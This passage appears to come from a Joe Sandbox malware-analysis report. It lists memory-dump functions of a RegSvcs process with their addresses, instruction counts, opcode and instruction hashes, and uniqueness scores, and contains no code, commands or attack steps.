                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8f51d267b3d85d85c0218afbb75c153bcb17c8e901efececf5db2866ca44fb24
                                                                                            • Instruction ID: 6202c7336217f89a7bca0dcf012182f17741da46a1388e408b65ad4380699c87
                                                                                            • Opcode Fuzzy Hash: 8f51d267b3d85d85c0218afbb75c153bcb17c8e901efececf5db2866ca44fb24
                                                                                            • Instruction Fuzzy Hash: 260144B1A1024DEFDB04DFA9D9519DEB7F8EF48704F10406AF904E7351D778AA019BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0104625D Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 354e4f847c010fca6db2e877f93c5cacfe27e4c10d732630dee96eeb2446dfdb
                                                                                            • Instruction ID: d804f28878a12ab7892a13f0e0192ee7e3e2bf64200c6bc1f1fc2a2aa386421c
                                                                                            • Opcode Fuzzy Hash: 354e4f847c010fca6db2e877f93c5cacfe27e4c10d732630dee96eeb2446dfdb
                                                                                            • Instruction Fuzzy Hash: 540144B1A1061DEFCB04DFA9D9519AEB7F8EF48744F10406AF904E7351D678AA01CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010462D6 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a09753816ebe794cf481647645f12a2476c9d588cc18016dfaf4377158bebbb9
                                                                                            • Instruction ID: 53daeaccef05d4fa8c1ac89ed00741d346136015319e57049a2b87b838ed34c1
                                                                                            • Opcode Fuzzy Hash: a09753816ebe794cf481647645f12a2476c9d588cc18016dfaf4377158bebbb9
                                                                                            • Instruction Fuzzy Hash: 800144B1A0024DEFDB04DFA9D95199EBBF8EF48704F50806AF914E7391D674AE018BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6C310 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                            • Instruction ID: 1924e66ca2b35a39cb8b0afe6ce4d04988f8b01fa9baf7bd713b3a46c56c8bd5
                                                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                            • Instruction Fuzzy Hash: C6F0F673644A329BC73216594C42B7BB6958FD1BA4F2A8035F1C99B344CA648C02B7E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FACA6F Relevance: .0, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                            • Instruction ID: 702d0d3a62027ff87cfb1048062701c0875871f8fe1803643107c5a79e2562d4
                                                                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                            • Instruction Fuzzy Hash: B201D6726006C99BD722E719C805B69BB98EF42760F0840A1FA08CB6A2DB7CDD01E350
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF20DE Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f8767194ba728975b55c388b40dd55e5d8d6484c6a916e094c64917c9ea24f9d
                                                                                            • Instruction ID: 658e97e4f00ce44f6e76f0946754fcc11262dd404c130bb14f45acba2c5df24f
                                                                                            • Opcode Fuzzy Hash: f8767194ba728975b55c388b40dd55e5d8d6484c6a916e094c64917c9ea24f9d
                                                                                            • Instruction Fuzzy Hash: B6F0C271A4030CBBD734E64CDC53FA9376CFB41B55F100069FB44AB292D6B8A944EA96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010461E5 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4ffb50aa2806a606daa9f34c5d433faaaf1e83f0a626f00dd4053003575776e2
                                                                                            • Instruction ID: aa58e792775c0f51e2256a63b577da94cdde0132a01b99287317e7b642b5aa64
                                                                                            • Opcode Fuzzy Hash: 4ffb50aa2806a606daa9f34c5d433faaaf1e83f0a626f00dd4053003575776e2
                                                                                            • Instruction Fuzzy Hash: DA0184B1A00658EBCB00DFA9D941ADEBBF4AF44710F144069F900E7390D738EA01CB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF63C0 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                            • Instruction ID: 5b3fc16d4d60009e13fdee717bedc5bdc2f95b5da0e1faa04451972512dc58af
                                                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                            • Instruction Fuzzy Hash: 9CF0F97220001DBFEF02AF94DD81DAF7BADEF59798B104125BA11A2161D635DE21ABA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5378a2c877f93695bb1eb1140393264622a3be4b821fc02cc3f1be2992921af1
                                                                                            • Instruction ID: 5b7c7dd036592c3d0dcbe133f2d476dc5c5ac7334352371bc27984de752eaf77
                                                                                            • Opcode Fuzzy Hash: 5378a2c877f93695bb1eb1140393264622a3be4b821fc02cc3f1be2992921af1
                                                                                            • Instruction Fuzzy Hash: 2BF024727083015BF314A6199C02F323696EBC1760F29803AEA898F6C3EA74DC41A3D4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA656A Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c97e7dd6ac66388bfe7474e2c1c9ac0b06314447620743797863fb1df9b24f47
                                                                                            • Instruction ID: 0719940a842e4b589d0b5c0a06f360e3d80c5847d0dd9fee376d39d4a7b029cb
                                                                                            • Opcode Fuzzy Hash: c97e7dd6ac66388bfe7474e2c1c9ac0b06314447620743797863fb1df9b24f47
                                                                                            • Instruction Fuzzy Hash: 3F01A4B1A006C49FE732AB29CD49B6537A4AB41B54F5C0194FA01CBAE6DB6CE801B610
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAA5D0 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e800a7032a7146629a366d96a52cc234fa297504c4e80f614fdb6d18789e8235
                                                                                            • Instruction ID: 554740cd99a8744f3251dc6218ad8703b4e0b227edc8eb61dfeb35f842ecbb0f
                                                                                            • Opcode Fuzzy Hash: e800a7032a7146629a366d96a52cc234fa297504c4e80f614fdb6d18789e8235
                                                                                            • Instruction Fuzzy Hash: AF01D1B2240700AFD311DF14CE46B1677E8E745B15F048939B548C7291E778D808EB46
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101437C Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                            • Instruction ID: 83f34bd84e3e93ca08dd6a72ec313b188de6bff60e953ac2d85771397b0dc153
                                                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                            • Instruction Fuzzy Hash: 76F02E31341D1347EBB6AB2D8870B2EB6D5AF80F10B05856DA5C5DB6A4DF18DC00D780
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F80218 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 55677226e1e3e6bfd95eb3aacf7f138ba87f453971b253e10a0c3e16f209f770
                                                                                            • Instruction ID: 757206233666b29860ca8535231f15305cdf3f4d7f2ee8b2375b507770e0747c
                                                                                            • Opcode Fuzzy Hash: 55677226e1e3e6bfd95eb3aacf7f138ba87f453971b253e10a0c3e16f209f770
                                                                                            • Instruction Fuzzy Hash: 90F0BE31D01600CFE3A6AF15C804B60B7A0FF01710FA10169E4858F2A2DBB9AC48EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFC89D Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ccbee6b9ac590af74aba78429e901133b6650ac699f523a13330613c9c2533d
                                                                                            • Instruction ID: cc55a143ceef9a50851f951715201f24da521ba72fda9d3aff37f83c45e75a8b
                                                                                            • Opcode Fuzzy Hash: 6ccbee6b9ac590af74aba78429e901133b6650ac699f523a13330613c9c2533d
                                                                                            • Instruction Fuzzy Hash: D9F0C8716053089FC314FF69C942E1BB7E4EF48750F40465AB894DB391E638EA00DB96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFE872 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                            • Instruction ID: c697f32b4448d22360ed6de1243b9406ddc46b2af5680e28c4322197b8574a9b
                                                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                            • Instruction Fuzzy Hash: 3DF05E73B51615ABD321AA49DC80F26B3A9AFC5BA0F290065A604AB270C760EC01E7D0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA0854 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                            • Instruction ID: 63e5c5188f7f2cd133badd6220b3f367183f9e90633d657622d6afbef3c7959a
                                                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                            • Instruction Fuzzy Hash: 44F0B4B2610204AFE714DB21CC01F96B3E9EF99350F1580789545D71A0FAB4DE01E658
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFC912 Relevance: .0, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a0fc8abddc6be8ef0e3e2bbd5da701c1a5fafdb3389abf6b701e3b3e561fbea
                                                                                            • Instruction ID: 7bcb1f48ea92f4920eb57d2f64723f37294ab21119b3e8a27e2dffdb1e031384
                                                                                            • Opcode Fuzzy Hash: 5a0fc8abddc6be8ef0e3e2bbd5da701c1a5fafdb3389abf6b701e3b3e561fbea
                                                                                            • Instruction Fuzzy Hash: 82F0A470A0120CDFCB14EF65C511AAEB7B4EF04700F008055B945EB395DA78EA01DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F747FB Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 41bce817e107f6df01665431388043164620fa1bf3669e508a4d393d503a6eb1
                                                                                            • Instruction ID: 4390f965ccb107291b27f9159bdf70d67315e640455620053e0d6672ad6a6f46
                                                                                            • Opcode Fuzzy Hash: 41bce817e107f6df01665431388043164620fa1bf3669e508a4d393d503a6eb1
                                                                                            • Instruction Fuzzy Hash: 2CF0C732C022E88ED7328A288444B65B788AB02730F1CC96BD89D83102C324EC80E603
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01030115 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
